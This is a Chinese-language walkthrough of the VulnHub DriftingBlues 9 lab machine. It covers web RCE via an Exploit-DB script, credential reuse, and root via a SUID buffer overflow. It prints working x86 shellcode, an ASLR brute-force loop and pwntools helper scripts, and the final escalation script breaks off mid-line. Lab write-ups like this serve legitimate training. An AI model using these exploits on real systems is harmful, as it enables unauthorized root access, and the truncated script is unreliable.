目录
简介
信息收集
漏洞发现与利用
权限提升
clapton用户Shell
缓冲区溢出
root用户Shell
总结
靶机地址:http://www.vulnhub.com/entry/driftingblues-9-final,695/
该靶机总的来说和作者描述的一样,是简单类型的,据说和OSCP的类似。通过搜索ApPHP MicroBlog漏洞发现远程代码执行漏洞,利用该漏洞获取网站权限,通过数据库连接文件获取用户密码,进而获取普通用户权限,最后通过缓冲区溢出SUID权限程序获得root用户权限。
使用Nmap扫描目标主机,发现80端口运行着Apache httpd 2.4.10服务,网站标题为ApPHP MicroBlog,操作系统为Debian,内核版本3.2 - 4.9,如图:
访问80端口Web服务,在网站底部发现Admin登录入口,如图:
访问Admin登录页面,如图:
测试未发现SQL注入和弱口令等,然后扫描网站目录,但未发现有价值的信息,如图:
然后搜索ApPHP MicroBlog相关漏洞,在Exploit-DB发现远程代码执行漏洞利用脚本,如图:
使用该脚本测试直接获得网站权限,如图:
查看网站文件发现include/base.inc.php文件中存在数据库用户名和密码,如图:
在/etc/passwd文件中发现存在普通用户clapton,和数据库用户相同,尝试使用该密码获取普通用户权限,发现当前Shell不是交互式shell,然后构造反弹Shell的命令,如图:
使用Python开启伪终端,使用刚刚获取到的用户名和密码成功切换到clapton用户Shell,如图:
在用户目录下发现input、note.txt和user.txt文件,note.txt文件中提示需要用缓冲区溢出,并给了新手32位程序缓冲区溢出学习资料:
如图:
将input文件下载到本地,使用checksec工具检查文件发现该文件未启用任何保护措施,如图:
使用命令sudo chown 0:0 input和sudo chmod 4755 input修改input文件所有者,并赋予程序特殊权限,如图:
使用cyclic工具生成500个字符组成的字符串用于计算偏移量,如图:
然后关闭操作系统ASLR,启动gdb调试input程序,将500个字符组成的字符串传入程序并运行后程序奔溃,EIP寄存器的值为“bsaa”,如图:
使用cyclic -l bsaa计算出偏移量为171,构造Payload:“171个A”+“jmp esp地址”+Shellcode,内存布局如下:
然后使用edb-debugger随便传入参数调试程序,如图:
运行程序后使用“Ctrl+O”快速打开Opcode Search插件,寻找jmp esp指令地址,如图:
选择第一个地址,执行./input `python -c "print 'A'*171+'\x79\xe3\xdc\xf7'+'\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80'"`成功获得root权限,如图:
但是在靶机执行时未成功,查看/proc/sys/kernel/randomize_va_space发现靶机开启了ASLR,参考Exploit 开发系列教程之七 绕过 ASLR进行ASLR绕过,代码如下:
#!/usr/bin/python3
from subprocess import call,Popen,PIPE
# "\x79\xe3\xdc\xf7"
# 获取libc基址前两个字节
p=Popen('ldd ./input | grep libc',shell=True,stdout=PIPE)
libc_addr=p.stdout.read()[-10:-6]
libc_addr=libc_addr.decode()
# 将libc基址前两个字节和jmp esp指令地址的后两个字节拼接
libc_addr='79e3'+libc_addr[2:4]+libc_addr[0:2]
libc_addr=bytes.fromhex(libc_addr)
pad=b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
sc=b'\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80'
buff=pad+libc_addr+sc
print(buff)
i=0
while 1<256:
ret=call(['./input',buff])
if not ret:
break
i+=1
依旧在本地成功,靶机中没有python3,将代码改为Python2版本后仍然失败,如图:
最后发现是因为libc.so.6不同造成的,使用find / -name libc.so.6 2>/dev/null找到靶机的libc.so.6文件,然后下载到本地,参考pwn入门实验1:缓冲区溢出(return2shellcode和jmp esp)获取jmp esp指令相对libc基址的偏移地址,代码如下:
#!/usr/bin/python3
from pwn import *
context(log_level = 'debug', arch = 'i386', os = 'linux')
libc = ELF('./libc.so.6')
jmp_esp = asm('jmp esp')
jmp_esp_addr_in_libc = libc.search(jmp_esp).__next__()
print(hex(jmp_esp_addr_in_libc))
获取靶机libc中jmp esp的偏移地址,如图:
修改提权脚本如下:
# -*- coding: utf-8 -*-
#!/usr/bin/python
from subprocess import call,Popen,PIPE
import struct
p=Popen("ldd ./input | grep libc",shell=True,stdout=PIPE)
libc_addr=p.stdout.read()[-12:-2]
print(libc_addr)
eip=0x2a81+int(libc_addr,16)
jmp_esp=struct.pack('
由于用户目录下没有权限写文件,因此使用ln ~/input /tmp/input命令在/tmp目录下创建软链接,将提权脚本上传到靶机,执行之后成功获得root权限,如图:
靶机虽然不难,但在提权过程中花了不少时间,主要是学过的缓冲区溢出又忘记了,最终还是重新拿回来了,做这种靶机感觉很有趣。